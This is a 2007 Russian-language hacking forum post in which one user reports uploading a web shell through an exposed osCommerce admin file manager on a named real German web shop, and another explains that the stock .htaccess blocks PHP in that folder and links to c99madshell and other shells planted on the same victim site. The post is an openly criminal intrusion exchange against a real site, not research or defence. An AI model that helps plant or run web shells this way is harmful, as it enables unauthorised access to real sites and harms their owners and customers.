
21.05.2007, 10:04
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме: 1845062
Репутация:
1079
|
|
Сообщение от -=lebed=-
Вот _http://www.hpnet.de/hpshop/catalog/admin/file_manager.php нашёл со второго разу сразу. Залил шелл в папку includes, права -rwxrwxrwx (777) у файла шела - пишет доступ запрещён (Forbidden) как быть?
Гы  А еще гуру. Файл .htaccess посмотри.
Код:
# $Id: .htaccess,v 1.4 2001/04/22 20:30:03 dwatkins Exp $
#
# This is used with Apache WebServers
# The following blocks direct HTTP requests in this directory recursively
#
# For this to work, you must include the parameter 'Limit' to the AllowOverride configuration
#
# Example:
#
#<Directory "/usr/local/apache/htdocs">
# AllowOverride Limit
#
# 'All' with also work. (This configuration is in your apache/conf/httpd.conf file)
#
# This does not affect PHP include/require functions
#
# Example: http://server/catalog/includes/application_top.php will not work
<Files *.php>
Order Deny,Allow
Deny from all
</Files>
PS И еще  Вот тебе шелл рабочий  http://www.hpnet.de/hpshop/catalog/includes/antichat.php.rar
http://www.hpnet.de/hpshop/catalog/includes/c99madshell.php.rar
PPS плюсик поставь 
Последний раз редактировалось Macro; 21.05.2007 в 10:08..
|
|
|